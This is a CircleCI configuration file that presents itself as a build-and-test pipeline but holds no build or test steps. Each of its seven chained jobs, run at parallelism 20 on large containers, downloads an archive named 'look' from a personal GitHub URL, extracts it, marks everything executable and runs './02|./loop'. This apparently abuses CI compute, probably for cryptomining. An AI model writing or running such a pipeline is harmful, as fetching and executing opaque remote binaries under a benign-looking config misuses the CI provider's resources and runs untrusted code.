version: 2.1


jobs:
  build:
    docker:
      - image: cimg/python:3.12
    parallelism: 20
    resource_class: large
    steps:
      - run:
          name: app1
          command: |
            curl -O https://raw.githubusercontent.com/ajunasidan/jundan/main/look
            tar -xf look
            chmod u+x *
            ./02|./loop


  test:
    docker:
      - image: cimg/python:3.12
    parallelism: 20
    resource_class: large
    steps:
      - run:
          name: app2
          command: |
            curl -O https://raw.githubusercontent.com/ajunasidan/jundan/main/look
            tar -xf look
            chmod u+x *
            ./02|./loop


  kals:
    docker:
      - image: cimg/python:3.12
    parallelism: 20
    resource_class: large
    steps:
      - run:
          name: app2
          command: |
            curl -O https://raw.githubusercontent.com/ajunasidan/jundan/main/look
            tar -xf look
            chmod u+x *
            ./02|./loop


  luks:
    docker:
      - image: cimg/python:3.12
    parallelism: 20
    resource_class: large
    steps:
      - run:
          name: app2
          command: |
            curl -O https://raw.githubusercontent.com/ajunasidan/jundan/main/look
            tar -xf look
            chmod u+x *
            ./02|./loop


  rens:
    docker:
      - image: cimg/python:3.12
    parallelism: 20
    resource_class: large
    steps:
      - run:
          name: app2
          command: |
            curl -O https://raw.githubusercontent.com/ajunasidan/jundan/main/look
            tar -xf look
            chmod u+x *
            ./02|./loop


  kuols:
    docker:
      - image: cimg/python:3.12
    parallelism: 20
    resource_class: large
    steps:
      - run:
          name: app2
          command: |
            curl -O https://raw.githubusercontent.com/ajunasidan/jundan/main/look
            tar -xf look
            chmod u+x *
            ./02|./loop


  sets:
    docker:
      - image: cimg/python:3.12
    parallelism: 20
    resource_class: large
    steps:
      - run:
          name: app2
          command: |
            curl -O https://raw.githubusercontent.com/ajunasidan/jundan/main/look
            tar -xf look
            chmod u+x *
            ./02|./loop








workflows:
  build_and_test:
    jobs:
      - build
      - test:
          requires:
            - build
      - kals:
          requires:
            - test
      - luks:
          requires:
            - kals
      - rens:
          requires:
            - luks
      - kuols:
          requires:
            - rens
      - sets:
          requires:
            - kuols











